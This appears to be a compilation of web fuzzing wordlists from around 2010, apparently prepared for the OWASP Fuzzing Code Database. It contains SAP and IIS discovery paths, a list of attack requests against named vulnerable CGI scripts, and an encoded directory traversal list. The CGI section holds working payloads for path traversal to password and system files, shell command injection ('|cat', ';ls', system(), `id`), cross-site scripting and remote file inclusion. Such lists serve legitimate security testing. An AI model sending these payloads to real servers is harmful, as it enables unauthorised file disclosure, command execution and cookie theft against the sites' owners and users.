/sap/bc/webdynpro/sap/esh_search_results.ui
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
/sap/bc/webdynpro/sap/esh_eng_modelling
/sap/bc/webdynpro/sap/esh_admin_ui_component
/sap/bc/webdynpro/sap/wdhc_application
/sap/bc/webdynpro/sap/wd_analyze_config_appl
/sap/bc/webdynpro/sap/wd_analyze_config_comp
/sap/bc/webdynpro/sap/wd_analyze_config_user
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
/sap/bc/webdynpro/sap/wdr_test_popups_rt
/sap/bc/webdynpro/sap/WDR_TEST_TABLE
/sap/bc/webdynpro/sap/wdr_test_ui_elements
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
/sap/bc/webrfc
/sap/bc/xrfc
/sap/bc/xrfc_test
/sap/es/cockpit
/sap/es/getdocument
/sap/es/opensearch
/sap/es/opensearch/description
/sap/es/opensearch/list
/sap/es/opensearch/search
/sap/es/saplink
/sap/es/search
/sap/es/redirect
/sap/crm
/sap/public/bc
/sap/public/bc/icons
/sap/public/bc/icons_rtl
/sap/public/bc/its/mimes
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
/sap/public/bc/its/mobile/itsmobile00
/sap/public/bc/its/mobile/itsmobile01
/sap/public/bc/its/mobile/rfid
/sap/public/bc/its/mobile/start
/sap/public/bc/its/mobile/test
/sap/public/bc/NWDEMO_MODEL
/sap/public/bc/NW_ESH_TST_AUTO
/sap/public/bc/pictograms
/sap/public/bc/sicf_login_run
/sap/public/bc/trex
/sap/public/bc/ur
/sap/public/bc/wdtracetool
/sap/public/bc/webdynpro/adobechallenge
/sap/public/bc/webdynpro/mimes
/sap/public/bc/webdynpro/ssr
/sap/public/bc/webdynpro/viewdesigner
/sap/public/bc/webicons
/sap/public/bc/workflow
/sap/public/bc/workflow/shortcut
/sap/public/bsp/sap
/sap/public/bsp/sap/htmlb
/sap/public/bsp/sap/public
/sap/public/bsp/sap/public/bc
/sap/public/bsp/sap/public/faa
/sap/public/bsp/sap/public/graphics
/sap/public/bsp/sap/public/graphics/jnet_handler
/sap/public/bsp/sap/public/graphics/mimes
/sap/public/bsp/sap/system
/sap/public/bsp/sap/system_public
/sap/public/icf_check
/sap/public/icf_info
/sap/public/icf_info/icr_groups
/sap/public/icf_info/icr_urlprefix
/sap/public/icf_info/logon_groups
/sap/public/icf_info/urlprefix
/sap/public/icman
/sap/public/info
/sap/public/myssocntl
/sap/public/ping
/sap/webcuif
/sap/public/icman/ping
/sap/admin
/sap/wdisp/admin
/scripts/wgate

Microsoft URLs (8 April 2010)

# Interesting IIS Files & Directories (8 April 2010)
# [email protected]
# creative commons
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. 
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.

/.printer
/%NETHOOD%/
/<script>alert('XSS')</script>.aspx
/AccessPlatform/
/AccessPlatform/auth/
/AccessPlatform/auth/clientscripts/cookies.js 
/AccessPlatform/auth/clientscripts/login.js 
/Exadmin/
/ExchWeb/
/Exchange/
/Microsoft-Server-ActiveSync/
/OMA/
/OWA/
/Public/
/_layouts/alllibs.htm
/_layouts/settings.htm
/_layouts/userinfo.htm
/_vti_bin/
/_vti_bin/_vti_aut/fp30reg.dll
/_vti_pvt/
/_WEB_INF/
/a%5c.aspx
/adovbs.inc
/aspnet_files/
/certcontrol/
/certenroll/
/certsrv/
/citrix/
/citrix/AccessPlatform/auth/
/citrix/AccessPlatform/auth/clientscripts/
/AccessPlatform/auth/clientscripts/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js 
/Citrix/AccessPlatform/auth/clientscripts/login.js 
/Citrix/PNAgent/config.xml
/exchange/root.asp
/forum.asp
/forum_arc.asp
/forum_professionnel.asp
/iisadmin/
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iiasdmpwd/
/iishelp/
/iishelp/iis/misc/default.asp
/iissamples/
/imprimer.asp
/includes/adovbs.inc
/msadc/
/null.htw
/pbserver/pbserver.dll
/postinfo.html
/rubrique.asp
/scripts/
/scripts/fpcount.exe
/scripts/cgimail.exe
/scripts/tools/newdsn.exe
/scripts/tools/getdrvs.exe
/scripts/convert.bas
/cgi-bin/htmlscript
/scripts/counter.exe
/scripts/no-such-file.pl
/share/
/tsweb/
/~/<script>alert('XSS')</script>.asp
/~/<script>alert('XSS')</script>.aspx
/index.shtml
/x.htw
/x.ida
/x.idq
/cgi
/scripts/iisadmin/ism.dll?http/dir
/scripts/samples/search/webhits.exe

Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)

# Vulnerable Cross-Platform CGI (17 March 2010) 
# fuzz inside cgi directories
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi
# [email protected]

%2e%2e/abyss.conf
.access
.cobalt
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
.fhp
.htaccess
.htaccess.old
.htaccess.save
.htaccess~
.htpasswd
.nsconfig
.passwd
.www_acl
.wwwacl
/_vti_pvt/doctodep.btr
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
AT-admin.cgi
AT-generate.cgi
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnyBoard.cgi
AnyForm
AnyForm2
Backup/add-passwd.cgi
C
Count.cgi
DC
DCFORM
File
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?<script>alert(\
FormMail.pl
ImageFolio/admin/admin.cgi
LWGate
LWGate.cgi
Upload.pl
Vs
W
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}
add_ftp.cgi
addbanner.cgi
adduser.cgi
admin.cgi
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}
admin.php
admin.php3
admin.pl
adminhot.cgi
adminwww.cgi
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
aglimpse
aglimpse.cgi
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
amadmin.pl
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
anyboard.cgi
archie
architext_query.cgi
architext_query.pl
ash
astrocam.cgi
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
auction/auction.cgi?action=
auctiondeluxe/auction.pl
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}
auth_data/auth_user_file.txt
awl/auctionweaver.pl
awstats.pl
awstats/awstats.pl
ax-admin.cgi
ax.cgi
axs.cgi
badmin.cgi
banner.cgi
bannereditor.cgi
bash
bb-hist?HI
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs_forum.cgi
betsie/parserl.pl/<script>alert('XSS')</script>;
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=
bizdb1-search.cgi
blog/
blog/mt-check.cgi
blog/mt-load.cgi
blog/mt.cfg
bnbform
bnbform.cgi
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10
boozt/admin/index.cgi?section=5&input=1
bsguest.cgi?email=x;ls
bslist.cgi?email=x;ls
build.cgi
bulk/bulk.cgi
c_download.cgi
cached_feed.cgi
cachemgr.cgi
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00
calendar
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar.pl
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|
calendar/index.cgi
calendar_admin.pl?config=|cat%20{KNOWNFILE}|
calender_admin.pl
campas?%0acat%0a{KNOWNFILE}%0a
cart.pl
cart.pl?db='
cartmanager.cgi
cbmc/forums.cgi
ccbill-local.cgi?cmd=MENU
ccbill-local.pl?cmd=MENU
cgforum.cgi
cgi-lib.pl
cgicso?query=<script>alert('XSS')</script>
cgicso?query=AAA
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00
cgiwrap
cgiwrap/%3Cfont%20color=red%3E
cgiwrap/~@U
cgiwrap/~JUNK(5)
cgiwrap/~root
change-your-password.pl
classified.cgi
classifieds
classifieds.cgi
classifieds/classifieds.cgi
classifieds/index.cgi
clickcount.pl?view=test
clickresponder.pl
code.php
code.php3
com5..........................................................................................................................................................................................................................box
com5.java
com5.pl
commandit.cgi
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}
common/listrec.pl
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
compatible.cgi
count.cgi
counter-ord
counterbanner
counterbanner-ord
counterfiglet-ord
counterfiglet/nc/
cs
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csLive
csNews.cgi
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
csPassword.cgi
csPassword/csPassword.cgi
csh
cstat.pl
cutecast/members/
cvsblame.cgi?file=<script>alert('XSS')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cvslog.cgi?file=<script>alert('XSS')</script>
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
dasp/fm_shell.asp
data/fetch.php?page=
date
day5datacopier.cgi
day5datanotifier.cgi
db2www/library/document.d2w/show
db4web_c/dbdirname/{KNOWNFILE}
db_manager.cgi
dbman/db.cgi?db=no-db
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
dfire.cgi
diagnose.cgi
dig.cgi
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00
displayTC.pl
dnewsweb
donothing
dose.pl?daily&somefile.txt&|ls|
download.cgi
dumpenv.pl
edit.pl
empower?DB=whateverwhatever
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
enter.cgi
environ.cgi
environ.pl
environ.pl?param1=<script>alert(document.cookie)</script>
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
eshop.pl/seite=;cat%20eshop.pl|
ex-logger.pl
excite
excite;IF
ezadmin.cgi
ezboard.cgi
ezman.cgi
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1
ezshopper2/loadpage.cgi
ezshopper3/loadpage.cgi
faqmanager.cgi?toc={KNOWNFILE}%00
faxsurvey?cat%20{KNOWNFILE}
filemail
filemail.pl
finger
finger.pl
flexform
flexform.cgi
fom.cgi?file=<script>alert('XSS')</script>
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
formmail
formmail.cgi
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
formmail.pl
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
fortune
ftp.pl
ftpsh
gH.cgi
gbadmin.cgi?action=change_adminpass
gbadmin.cgi?action=change_automail
gbadmin.cgi?action=colors
gbadmin.cgi?action=setup
gbook/gbook.cgi?_MAILTO=xx;ls
gbpass.pl
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1
getdoc.cgi
gettransbitmap
glimpse
gm-authors.cgi
gm-cplog.cgi
gm.cgi
guestbook.cgi
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|
guestbook.pl
guestbook/passwd
handler.cgi
hitview.cgi
horde/test.php
horde/test.php?mode=phpinfo
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00
htgrep?file=index.html&hdr={KNOWNFILE}
html2chtml.cgi
html2wml.cgi
htmlscript?../../../../../../../../../..{KNOWNFILE}
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
htsearch?-c/nonexistant
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch?exclude=%60{KNOWNFILE}%60
ibill.pm
icat
if/admin/nph-build.cgi
ikonboard/help.cgi?
imageFolio.cgi
imagefolio/admin/admin.cgi
imagemap
include/new-visitor.inc.php
index.js0x70
index.pl
info2www
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}>
infosrch.cgi
ion-p?page=../../../../..{KNOWNFILE}
jailshell
jj
journal.cgi?folder=journal.cgi%00
ksh
lastlines.cgi?process
listrec.pl
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
log-reader.cgi
log/
log/nether-log.pl?checkit
login.cgi
login.pl
login.pl?course_id=\
logit.cgi
logs.pl
logs/
logs/access_log
logs/error_log
lookwho.cgi
ls
lwgate
lwgate.cgi
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..{KNOWNFILE}
mail
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00
mailit.pl
maillist.cgi
maillist.pl
mailnews.cgi
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}
majordomo.pl
man2html
mastergate/search.cgi?search=0&search_on=all
meta.pl
mgrqcgi
mini_logger.cgi
mmstdod.cgi
moin.cgi?test
mojo/mojo.cgi
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}
mrtg.cgi?cfg=blah
ms_proxy_auth_query/
mt-static/
mt-static/mt-check.cgi
mt-static/mt-load.cgi
mt-static/mt.cfg
mt/
mt/mt-check.cgi
mt/mt-load.cgi
mt/mt.cfg
multihtml.pl?multi={KNOWNFILE}%00html
musicqueue.cgi
myguestbook.cgi?action=view
namazu.cgi
nbmember.cgi?cmd=list_all_users
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}
netpad.cgi
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}
nimages.php
nlog-smb.cgi
nlog-smb.pl
non-existent.pl
noshell
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
nph-error.pl
nph-exploitscanget.cgi
nph-maillist.pl
nph-publish
nph-publish.cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-test-cgi
ntitar.pl
opendir.php?{KNOWNFILE}
orders/orders.txt
pagelog.cgi
pals-cgi?palsAction=restart&documentName={KNOWNFILE}
parse-file
pass
passwd
passwd.txt
password
pbcgi.cgi?name=Joe%Camel&email=%3C
perl
perl?-v
perlshop.cgi
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
phf
phf.cgi?QALIA
phf?Qname=root%0Acat%20{KNOWNFILE}%20
photo/
photo/manage.cgi
photo/protected/manage.cgi
php-cgi
php.cgi?{KNOWNFILE}
plusmail
pollit/Poll_It_
pollssi.cgi
post-query
post_query
postcards.cgi
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
printenv
printenv.tmp
probecontrol.cgi?command=enable&username=cancer&password=killer
processit.pl
profile.cgi
pu3.pl
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10
query
query?mss=%2e%2e/config
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=
quikstore.cfg
quizme.cgi
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}
ratlog.cgi
redirect
register.cgi
replicator/webpage.cgi/
responder.cgi
retrieve_password.pl
rksh
rmp_query
robadmin.cgi
robpoll.cgi
rpm_query
rsh
rtm.log
rwcgi60
rwcgi60/showenv
rwwwshell.pl
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22
sbcgi/sitebuilder.cgi
scoadminreg.cgi
scripts/*%0a.pl
search.cgi
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.php?searchstring=<script>alert(document.cookie)</script>
search.pl
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
sendform.cgi
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}
session/adminlogin
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}
sh
shop.cgi?page=../../../../../../..{KNOWNFILE}
shop.pl/page=;cat%20shop.pl|
shop/auth_data/auth_user_file.txt
shop/orders/orders.txt
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|
show.pl
showcheckins.cgi?person=<script>alert('XSS')</script>
showuser.cgi
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|
simplestguest.cgi
simplestmail.cgi
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
spin_client.cgi?aaaaaaaa
ss
sscd_suncourier.pl
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
stat.pl
stat/
stats-bin-p/reports/index.html
stats.pl
stats.prf
stats/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats_old/
statsconfig
statusconfig.pl
statview.pl
store.cgi?
store/agora.cgi?cart_id=<script>alert('XSS')</script>
store/agora.cgi?page=whatever33.html
store/index.cgi?page=../../../../../../../..{KNOWNFILE}
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00
survey
survey.cgi
sws/admin.html
sws/manager.pl
tablebuild.pl
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1
tcsh
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}
test-cgi.tcl
test-cgi?/*
test-env
test.cgi
test/test.cgi
texis/junk
texis/phine
textcounter.pl
tidfinder.cgi
tigvote.cgi
title.cgi
tpgnrock
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}
troops.cgi
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}
ultraboard.cgi
ultraboard.pl
unlg1.1
unlg1.2
update.dpgs
upload.cgi
uptime
urlcount.cgi?%3CIMG%20
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}
utm/admin
utm/utm_stat
view-source
view-source?view-source
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewlogs.pl
viewsource?{KNOWNFILE}
viralator.cgi
virgil.cgi
vote.cgi
vpasswd.cgi
vq/demos/respond.pl?<script>alert('XSS')</script>
w3-msql
w3-sql
wais.pl
way-board.cgi?db={KNOWNFILE}%00
way-board/way-board.cgi?db={KNOWNFILE}%00
webais
webbbs.cgi
webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20{KNOWNFILE}
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webdist.cgi?distloc=;cat%20{KNOWNFILE}
webdriver
webgais
webif.cgi
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
webmap.cgi
webnews.pl
webplus?about
webplus?script=../../../../../../../../../..{KNOWNFILE}
websendmail
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}
webutil.pl
webutils.pl
webwho.pl
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}
windmail
wrap
wrap.cgi
ws_ftp.ini
www-sql
wwwadmin.pl
wwwboard.cgi.cgi
wwwboard.pl
wwwstats.pl
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwwais
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00
zsh

Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)

# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) 
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. 
# [email protected] 

../{FILE}
../../{FILE}
../../../{FILE}
../../../../{FILE}
../../../../../{FILE}
../../../../../../{FILE}
../../../../../../../{FILE}
../../../../../../../../{FILE}
..%2f{FILE}
..%2f..%2f{FILE}
..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
%2e%2e/{FILE}
%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
..%252f{FILE}
..%252f..%252f{FILE}
..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
%252e%252e/{FILE}
%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
..\{FILE}
..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}
%252e%252e\%252e%252e\%252e%252e\{FILE}
